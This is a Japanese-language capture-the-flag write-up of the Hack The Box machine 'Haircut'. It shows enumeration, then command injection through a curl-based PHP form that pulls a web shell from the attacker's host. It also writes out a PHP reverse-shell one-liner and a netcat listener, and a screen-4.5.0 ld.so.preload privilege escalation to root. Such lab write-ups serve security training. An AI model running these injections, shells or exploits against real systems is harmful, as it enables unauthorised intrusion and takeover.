Hack The Box Haircut
Haircut
Sweets
- OWASPのdirbusterのリストは優秀
- webサーバで使用されているコマンドや構造を把握することが大事
Procedure
portscan
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA) | 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA) |_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519) 80/tcp open http nginx 1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: HTB Hairdresser
web enum
- dirb uploadsディレクトリとtest.htmlが見つかるが特に情報なし
- nikto 同上
- ZAP Forced Browse 同上
dirsearch 残存ファイルが見つかる
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.24/ -e sh,php,html -w ~/.ZAP/fuzzers/dirbuster/directory-list-1.0.txt -f [16:48:45] Starting: [16:48:52] 200 - 446B - /exposed.php [16:49:24] 200 - 144B - /index.html [16:51:12] 200 - 141B - /hair.html [16:52:24] 200 - 223B - /test.html [16:54:44] 301 - 194B - /uploads -> http://10.10.10.24/uploads/ [16:54:44] 403 - 580B - /uploads/
-
フォームで渡したURLのコンテンツを読み込むよう curlコマンドでリンク先ファイルを取得しているようだ。
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 28 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded Referer: http://10.10.10.24/exposed.php formurl=sleep%2010&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 05 May 2021 08:44:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 1578 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:07 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:08 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: sleep 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (7) Could not resolve host: sleep </span> </body> </html>
直接のPHPでのコード実行は失敗
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 64 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded Referer: http://10.10.10.24/exposed.php formurl=http%3A%2F%2F10.10.14.2%3A12345%2FcmdShell.php&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 05 May 2021 09:07:42 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 822 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 34 100 34 0 0 89 0 --:--:-- --:--:-- --:--:-- 89 <?php system('ls'); exec('ls'); ?> </span> </body> </html>
curlコマンドの-oオプションでphpファイルのアップロードを試みる
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 80 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.24/exposed.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close formurl=http%3A%2F%2F10.10.15.3%3A12345%2FcmdShell.php+-o+cmdShell.php&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Sun, 09 May 2021 01:40:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 897 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file cmdShell.php: Permission denied 100 347 100 347 0 0 2124 0 --:--:-- --:--:-- --:--:-- 2128 curl: (23) Failed writing body (0 != 347) </span> </body> </html>
"Failed writing body"から書き込みに失敗している様子。 dirsearchで見つけたuploadsディレクトリには書き込み可能かもしれない。
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 94 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.24/exposed.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close formurl=http%3A%2F%2F10.10.15.3%3A12345%2FcmdShell.php+-o+.%2Fuploads%2FcmdShell.php&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Sun, 09 May 2021 01:51:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 788 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 347 100 347 0 0 1119 0 --:--:-- --:--:-- --:--:-- 1122 </span> </body> </html>
!!web shell uploading Done!!
自端末でリスナーを作成
$ nc -lnvp 4444
web shellからリバースシェルを取得する
php -r '$sock=fsockopen("10.10.15.3",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
!!Get User Flag!!
local enum mysqlサーバがはしっている
$ netstat -lnt Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp6 0 0 :::80 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN
linpeas
[SNIP] [+] SUID - Check easy privesc, exploits and write perms [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 1.6M May 19 2017 /usr/bin/screen-4.5.0 [SNIP]
screen-4.5.0という実行ファイルにSUIDがついているよう。 screen-4.5.0でググるとExploit DBにExploit codeが見つかる。
exploit実行
$ chmod +x 41154.sh $ sh ./41154.sh ~ gnu/screenroot ~ [+] First, we create our shell and library...
shを叩くも、うまく実行できていなさそう。
ここで失敗している。
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
仕方がないので、攻撃端末でビルドしたものをアップロードする。 その後、Exploitコードをそのまま実行する。
$ cd /etc $ umask 000 $ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" $ screen -ls ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data. $ /tmp/rootshell whoami root
Get Root Shell